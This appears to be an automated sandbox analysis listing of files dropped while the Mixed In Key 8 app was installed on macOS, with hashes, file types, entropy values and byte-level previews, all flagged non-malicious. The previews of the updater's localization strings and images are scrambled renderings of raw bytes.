                                                                                                    Preview: ..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @ah ralddta sen dco h.. rlkraa tta vn..dn!aV li ludi snatllre aed tco htsraat% $1 @un"?.;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =%"$1 @ak nnietu ppadetar s.nr.d tek ..srf .rn.e nksirsvykdddav lomys moe nksvivaibdle llree npoitkse hnte .lFtyat% $1 @itllm paep nrPgoar,ms attr amod ned ..irrf..,no hcf ..sr.. kgine"..;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$. r.f .. r.nr.avardn eed nesants eitll.gn.lggi aevsroien.n;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =%"$1 @2%@$. r.n uitll.gn.lggi..d. uah r3%@$ .iVlld ualdd aen dun"?.;".@%d wolnaoed"d= " @%n dealddta;"..%" @fo% "@= " 1%@$a v2%@$;"..A"n wev reisnoo f@%i svaiaallb!e " =E" nynv reisnoa v@%f nisnt ligl..gnil!g
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/th.lproj/.BC.T_1G80BN
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):5916
                                                                                                    Entropy (8bit):5.025902622174575
                                                                                                    Encrypted:false
                                                                                                    MD5:0C92DA23049E5A1346DD37553AC485A7
                                                                                                    SHA1:0C06662F184345576EED454EB471D590ADEBA2E9
                                                                                                    SHA-256:0BB6AC8645986AD5E03BCCD732B30525B7DCF507704C29C17DEBACF4BED3C33B
                                                                                                    SHA-512:3CF99C2ECD68A390A27B93F14CD4C9DD724C6B632A9B09A1CB05B2918404CEA6D75C046867D2D73B5D1EA0D19736105C0C8F76F35CD933E90ABDEFBCE14E1491
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @.................................................................................................. ........................................................................... .1%@$. .........................................................."..;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =%"$1 @.......................................................................................................................................................................................................................... .............% $1 @......................................................................... ........................................ ...................................................................;"..%" @@%i sucrrnelt y
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/tr.lproj/.BC.T_nZqIB0
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):4340
                                                                                                    Entropy (8bit):5.08681039554709
                                                                                                    Encrypted:false
                                                                                                    MD5:C6C97B845A2111FF482651A70310CC1A
                                                                                                    SHA1:976A2345D208145519C2AF1C4149C6C10775EABF
                                                                                                    SHA-256:CB792ECED2E4B941EF68CBC8B85091BE1D7F4CD344C7BB4CB31398BD35427304
                                                                                                    SHA-512:4A68BF9D332CEFBE41BC7EC3D78AD64FF5AA664FEDDB0E29D0193B45470D68D1EBA6903BA26AB80861B6148570A589DC884947992F9881DE70C1737C5C66A397
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..*/d _eEDv .0 1 -oNc moemtnp orived dybe gnniee.r* ./".1%@$% $2 @ah sebned wolnaoed dna dsir aeydt osu!eW uodly uol ki eoti snatlli tna deralnuhc% $1 @on?w " =%"$1 @2%@$i dnriliidv eukllna..amh za..!r. i.dm i.yk.elem ksiitoy rumusun?zU gyluma aeyined nab..al.tl.caka.tr."..;/. *edD_ E0v1.- N oocmmne trpvodideb yneigenre ./*..%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aidksi ameg .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn htif or mhtre,ea dnt yra agni".= " 1%@$u gylumasa..d si kak.lb...i ..resiniedkyneg ..cnleelenem.zL ..ftne% $1 @yuugalam.sn...U gylumalarad zinini eokyplaya.. peyined nab..al.tn....z;"..*/d _eEDv .0 1 -oNc moemtnp orived dybe gnniee.r* ./".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$m veuc tney ne i.sr...dm...r;"..*/d _eEDv .0 1 -oNc moemtnp orived dybe gnniee.r* ./".@%% @sin woa avlibael--oy uahev% .@W uodly uol ki eotd wolnao dtin wo"?= " 1%@$% $2 @....tk..( uKllna.d....n... z.Sr...:m% $3)@ ...miidy ne i.sr....m .niidmrkei tsrem sinizi
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/uk.lproj/.BC.T_WzOT8D
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode English text, with very long lines
                                                                                                    Size (bytes):6696
                                                                                                    Entropy (8bit):4.156961851830748
                                                                                                    Encrypted:false
                                                                                                    MD5:2BBB283FC0806301EDAE390A28116EB2
                                                                                                    SHA1:84BE78941B29ADA51DCA8D09F062DB777E6344E6
                                                                                                    SHA-256:64914509A698B22799B06ACE0831B96A1023C3A9695A74308CD5ED4B4ED0FA01
                                                                                                    SHA-512:8A7E9845EDA6702122FC087ADFE84B3DC62782F1D5E94A2A59B34A6AFB488448E47E11D054F813E865EA2D400485AAF21CDD37A9FB2A7A16CC782BCA16158AED
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. .7.0.2.0.=.B.0.6.5.=.8.9. .V. .3.>.B.>.2.8.9. .4.>. .2.8.:.>.@.8.A.B.0.=.=.O.!. ...0.6.0.T.B.5. .2.A.B.0.=.>.2.8.B.8. .V. .?.5.@.5.7.0.2.0.=.B.0.6.8.B.8. .%.1.$.@.?.".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. ."...V.4. .G.0.A. .@.>.1.>.B.8. .7. .%.1.$.@. .7. .B.>.<.C.,. .I.>. .?.@.8.7.=.0.G.5.=.8.9. .;.8.H.5. .4.;.O. .G.8.B.0.=.=.O.,. .=.0.?.@.8.:.;.0.4.,. .>.1.@.0.7.C. .4.8.A.:.0. .G.8. .>.?.B.8.G.=.>.3.>. .4.8.A.:.C.,. .9.>.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/zh_CN.lproj/.BC.T_gxS1bP
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):3190
                                                                                                    Entropy (8bit):5.962955012702519
                                                                                                    Encrypted:false
                                                                                                    MD5:09EC9B35B013F07C4086E2432DBCCE7F
                                                                                                    SHA1:0FDD932C1DD967D03E843AFBCB6EE72FF65467AB
                                                                                                    SHA-256:32DC66D14898CF2225877756CB29B110672FEAA18E31F3E3BB6E93434A9F1C4F
                                                                                                    SHA-512:E20E208EF35222F8FF59AD902A952807D6FF838CD6E234BC26C7E3B9BB90DFED0B1B62E50BD7D6C6092329BE8F6E12037C75944F908C7AC449DDD8438F742701
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @......................................................% $1 @..?.;"..%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aerdao-ln yovuleml ki e aidksi amego rnao tpcilad irev .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn htif or mhtre,ea dnt yra agni".= " 1%@$. ..................................................................................................% $1 @..........................................;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " 1%@$% $2 @.........................."..;".@%% @sin woa avlibael--oy uahev% .@W uodly uol ki eotd wolnao dtin wo"?= " 1%@$% $2 @..........................................% $3.@............................"..;".@%d wolnaoed"d= " @%. ........;"..%" @fo% "@= " 1%@$/ % $2"@.;". Aen wevsroi nfo% @sia avlibael"!= " ............% @........................;"..A"n wev reisnoo f@%i serda yoti snatll"!= " ............%
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/zh_TW.lproj/.BC.T_77pz2K
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):3096
                                                                                                    Entropy (8bit):5.999412604664841
                                                                                                    Encrypted:false
                                                                                                    MD5:141F43A3CE5CB5DED83C83E0DA541F50
                                                                                                    SHA1:BC62DC9E9EFF199B40FC884B5CC0AF645EBC6753
                                                                                                    SHA-256:6C718D352F88367AA9AFDCD11FE60BC1D0BA89C405EF8F7509B22D8974546DF7
                                                                                                    SHA-512:E1C0FB4948F6DA3BC82EE4B49111339582689FD3DA778BE3623233CC9F83F90BF056954D36394B98BF745E45CF1FAC0BA7F8557A179FCFC4A085B54121EA02B7
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @..................................................................1%@$.."..;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =."..% $1 @............................................................................................ .1%@$. ...................................................................................... ;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " 1%@$% $2 @..............................;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =%"$1 @2%@$. ......................................% $3.@..........................;"..%" @odnwoldade " =%" @........"..;".@%o f@% " =%"$1 @ /2%@$;"..A"n wev reisnoo f@%i svaiaallb!e " =."................ .@%. ..............;"..A"n wev reis
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/_CodeSignature/.BC.T_mBwicl
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:XML document text
                                                                                                    Size (bytes):20623
                                                                                                    Entropy (8bit):5.1614882899514205
                                                                                                    Encrypted:false
                                                                                                    MD5:94458A3242733B30C0A45FD5491F2477
                                                                                                    SHA1:C0DC7571454B3EB6628C33C9E1A557738057FA73
                                                                                                    SHA-256:B51398D71DE090095D04082C09B2CF7339949452511397C36452E9371D1BEE45
                                                                                                    SHA-512:3D4FC017A318A2FB5E69577A2CE33CC2BA77BCFF495E69093369AF2482EA0CE1E01AEC72A5C6B5B5F31894F95A8BD5AD047590B2036DBEC41458F37B7A866B4B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>files</key>..<dict>...<key>Resources/Autoupdate.app/Contents/Info.plist</key>...<data>...O92EYJpsmyRV92gaoHI05SUu4Yw=...</data>...<key>Resources/Autoupdate.app/Contents/MacOS/Autoupdate</key>...<data>...Put3K+2mVWcE2eXPTJAqwD7qgLc=...</data>...<key>Resources/Autoupdate.app/Contents/PkgInfo</key>...<data>...n57qDP4tZfLD1rCS43W0B4LQjzE=...</data>...<key>Resources/Autoupdate.app/Contents/Resources/SUStatus.nib</key>...<data>...sYsx+yJdk7U5jlaT5UjkYAO2vYY=...</data>...<key>Resources/Autoupdate.app/Contents/Resources/Sparkle.icns</key>...<data>...RAPi1GDm7RjA+JlOSVD1eYK+1VA=...</data>...<key>Resources/Autoupdate.app/Contents/Resources/ar.lproj/Sparkle.strings</key>...<dict>....<key>hash</key>....<data>....3lN5msMrnMK9Fubf02YF5yyKp7U=....</data>....<key>optional</key>....<true/>...</dict>...<key>Resources/Autoupdate.a
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/_CodeSignature/.BC.T_nHJCe0
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:XML document text
                                                                                                    Size (bytes):3399
                                                                                                    Entropy (8bit):5.145413299931296
                                                                                                    Encrypted:false
                                                                                                    MD5:2D14690139D91C43CA58050C82F5E252
                                                                                                    SHA1:3C6F16AC3FCE219F16E50CEAFA4FB258F19C0A83
                                                                                                    SHA-256:DAEB80DB8E30804C6439A44FE5D7FDF9B680042ED8731B133BB1753083DF605E
                                                                                                    SHA-512:62327B47671A3A4D654109BECCD0B75531E7CE35381DC097128974A4279DCCE32CD70C6FD976DD38482C0B591956BC52A7D6E7611D68A287DF692394E53C71DE
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>files</key>..<dict>...<key>Resources/Info.plist</key>...<data>...eIKZmx3v13Nmi4ejZNGESnMfL2A=...</data>..</dict>..<key>files2</key>..<dict>...<key>Frameworks/Sparkle.framework</key>...<dict>....<key>cdhash</key>....<data>....KGMqQXtU82gc9WsQXpse8j5TSLE=....</data>....<key>requirement</key>....<string>identifier "org.andymatuschak.Sparkle" and anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */ and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and certificate leaf[subject.OU] = T4A2E2DEM7</string>...</dict>...<key>Resources/Info.plist</key>...<dict>....<key>hash</key>....<data>....eIKZmx3v13Nmi4ejZNGESnMfL2A=....</data>....<key>hash2</key>....<data>....zTd6Flq0y1kJteunMp6I7bBSePtwwVULrEq3BJmALnc=....</data>...</dict>...<key>XPCServices/com.andymatuschak.Sparkle.San
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/MacOS/.BC.T_b1MPG3
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Mach-O 64-bit executable
                                                                                                    Size (bytes):1979920
                                                                                                    Entropy (8bit):6.18811551972665
                                                                                                    Encrypted:false
                                                                                                    MD5:78349859202DF2B3FE03DFCDDDFE1F33
                                                                                                    SHA1:4D5D157ABE44202B396305A9AA0C1A5F8E64B4C1
                                                                                                    SHA-256:6A7C5843439123FBEC749B43782634210F96A5F83D2B331EAE7E109A0C070C6F
                                                                                                    SHA-512:94ACD83181CD567028F5734D5FD584709DF15AE1F6EE27B5E2E28003054B24DABE4C1C2FD956360DDD209118E80583737120507B5A8F7A6EBA496A680709D1D9
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ................<......... .........H...__PAGEZERO..........................................................8...__TEXT..........................................................__text..........__TEXT...........(...............(..............................__stubs.........__TEXT..........."..............."..............................__stub_helper...__TEXT..........|,..............|,..............................__objc_methname.__TEXT...........<....... .......<..............................__objc_classname__TEXT...........\...............\..............................__objc_methtype.__TEXT..........(l......./......(l..............................__cstring.......__TEXT..........................................................__const.........__TEXT..........`........l......`...............................__gcc_except_tab__TEXT..........................................................__swift3_typeref__TEXT...........2.......>.......2..............................__swift3_assocty__TEXT..
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_0Hg8YD
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 190 x 50, 8-bit/color RGBA, non-interlaced
                                                                                                    Size (bytes):66119
                                                                                                    Entropy (8bit):3.5402911519969726
                                                                                                    Encrypted:false
                                                                                                    MD5:7859A67EBC07FDF778C521E41BE9EDB9
                                                                                                    SHA1:A18BB046C3FDB288605F8B2357300E40091FA3CE
                                                                                                    SHA-256:E8986B5809DBB2F57AD06BF740FEBA911BD0DA7F68C4AD6B298A318BFA50A78E
                                                                                                    SHA-512:D2E781FE9B31CCF51CF318F3F48FE51A24F60060B67E0F2C7A6171FCCE0214FE7C315F4AFB897D3F9C8B4F75C8ABD79C3C376E3C914C1A16C1E3B51C49D0203C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR.......2.......a>....pHYs...%...%.IR$....OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE...........Q,......!.........{.k........>...........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-...."bb.....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<......$.2].G......L......b...G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt.......o..(...h...w..?.G.%..fI.q..^D$.T..?....D..*.A....,.........`6.B$..B.B.d..r`)..B(....*`/.@.4.Qh..p...U..=p..a...(....A...a!...b.X#......!.H...$ ...Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6....h...>C.0....3.l0...B.8,..c.."......V.....c..w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_0qkjp3
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:TIFF image data, big-endian
                                                                                                    Size (bytes):11152
                                                                                                    Entropy (8bit):7.086629719668385
                                                                                                    Encrypted:false
                                                                                                    MD5:C9A00A0F29674D3F0371EEF34BC85B51
                                                                                                    SHA1:07000C064ED3F254A22AA5542F8A529890586BBC
                                                                                                    SHA-256:AE6B9ABD62D529F2F977ABAF1631C4DBBCB8EC3A41E380D48D57B73F4AB699FD
                                                                                                    SHA-512:FBDD55B83C1F3CEBFE31B20E3EA3C66D34AB1856053513427A2B95FE0DD146F7EF442F8D471037977618F0571C7D19E070260614087F3B90BC9116B267596F09
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: MM.*.................>.......................,...........,....2016:07:27 02:44:26..?.@.$....BaP.d6...DbQ8......cQ..v=....l..~M...HPQ..I..AB......nAY.U...'..FB.<..#.....M"_.,AJ.Qu2&......T..G..)TX...C.R..T..._.B..S.).'.X..j4..c....T..%.~A@.WT...z.@PP|.7..Eq0L\...2R......}._.qZB..^.-`.(+&.%.>.!9d.{.).EQ..(...R..[..W..h...+........+f..'AN.Q.7...A.4..G.d.Y.\.e!m.$.1P.......0....+t...#..@hC6.3..n..Hs..9.K..$I!X.?L..F...*!..B....(.. .r.m....Y..."......!0|"V.B....o.....@.........$H..((....)R...).............JQ^.4..2.=.R......C ......*.%.......l...qj.%....9IP..:$...'...."!.x._....... ...i."W.B.&.5..p....C.Wt..{!5......sA..@....s.....i9.() ...h..!...B......H)%D ...rQ.].....kj......,.._@..mf .."Q..%....+.# ..!D.......)D...%"..t.m. ...K .Z......R"...p ...+ ..8. ...p .H.b!.v...HK&........U=JC.....hlX...N..jh!A.F(h>......lh!......R&.,....I<..(a..J........z ..v.:@...3.%.....*. .[.........)2...RW$.4j.S!.j..!3-.."1..C...$...F....r.. .......<._@.2.......h!..<h!....)*....p.! ..g........<. .W..........#|
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_1Eai38
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 40 x 76, 8-bit/color RGBA, non-interlaced
                                                                                                    Size (bytes):4309
                                                                                                    Entropy (8bit):7.883168293204685
                                                                                                    Encrypted:false
                                                                                                    MD5:66663506FF52DA921ED0EB28001D850E
                                                                                                    SHA1:2374E3A7DA1066BE2940B3BB907DD1BC81C5C45D
                                                                                                    SHA-256:58A735B284502F6215EF20EE522CA94253EB46608A89BF6E5FB14D93B1A933BC
                                                                                                    SHA-512:B1B6FA35C18140ACA4C90FF7E7FEA390A8DE86B1B3777409B6187982BA9DD94EE6115A0E4C9A3FE75CD018CB815400C4C6DDB577211F8B1B07B77CD16E0E2F56
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR...(...L........!....iCCPICC Profile..H....TSY...{/..B..z.........PB.1!...Q.. "...C..G..X.Ql..R..dPQ.....}..vv.....|........n.=....\c.x......L~...=&6......Q..P`..<...@.j..W}.D...c2S....WI...,..P....V..g.8...3.@.h^+;.7.[Q.....\9...|r..f.....0O... P.L~2....<=.....`P6..9\..Qva.0.y(.=`...b......Ou..R3A\..L........#..3W..........C..J../lf>t...V......2...lO3."...c..3n..L..9..E..1.?.,'..1...a.....@q.D......s...a.qnJD..gq...X...0?.S.....='.}...!......+3%.o...q?.D/oq..).............+......f..l.S....uB...8 .0.+31gf_....U|NrJ&..=%.t..ejL.4...`.........%H.0.....Q.Mr.s...h.....|N;...G.8.....fs3[.`..H.Y.......&....'....?... .,.,..2..d.<....".........u..8.Z.9p.\.7A/........`.|.S...!*D.. uH.2.,!{......0(....!.$...MP.T..C..z...,t....A...h.z.}.........l....p.../....p.......j.8.._.o....~.O".!#...b..#.H...$!|d-R..".H#..t#w.......ah.:......DbX.......rL.........L`.c.X........`.....l).........a?.p8y..........V......p..>.(n...+......<.../....._.......d.:...C.#p.....c...~.3..Q..Ct$....U.....v.m
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_3Urudd
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 190 x 50, 8-bit/color RGBA, non-interlaced
                                                                                                    Size (bytes):66119
                                                                                                    Entropy (8bit):3.966983863790688
                                                                                                    Encrypted:false
                                                                                                    MD5:62B8EE77BAA47C623AE75E5F7D2170C5
                                                                                                    SHA1:6D676CCB8F0D2918322D07792C6A1F556421C671
                                                                                                    SHA-256:6630F1A192A248444B3E2561FE6E6CA36E461FC1E36A9800D62520080DC9AA73
                                                                                                    SHA-512:0BE01FB0DDDA1123F5E7AC440F5452D2301AADE20D2683532760C8354399F519057B10008CF2848725C9A04D1A36DE247F871C1945150B8F95EFD5636ED73E03
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR.......2.......a>....pHYs...%...%.IR$....OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE...........Q,......!.........{.k........>...........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-...."bb.....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<......$.2].G......L......b...G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt.......o..(...h...w..?.G.%..fI.q..^D$.T..?....D..*.A....,.........`6.B$..B.B.d..r`)..B(....*`/.@.4.Qh..p...U..=p..a...(....A...a!...b.X#......!.H...$ ...Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6....h...>C.0....3.l0...B.8,..c.."......V.....c..w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_5yVzJL
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C program text
                                                                                                    Size (bytes):3808
                                                                                                    Entropy (8bit):5.252982103180177
                                                                                                    Encrypted:false
                                                                                                    MD5:41FEACAB6AC6F3756FF7A69B36582870
                                                                                                    SHA1:020B00230C07EADE7033FCD783A6D437AB832EFB
                                                                                                    SHA-256:229AB2959BB8F724BDBA9416C102791B8FC6FDD3DCBE49B5B37082A9361869E9
                                                                                                    SHA-512:C71ECF25E25507316AE3C8B6C75987516EF5C2FCB657CCB5AD5CD86948B6C470A7F629DECE79A408269F9CF5D0C42EBDEA49B1FBD57D286CB2411AFB61A888F0
                                                                                                    Malicious:false
                                                                                                    Reputation:low
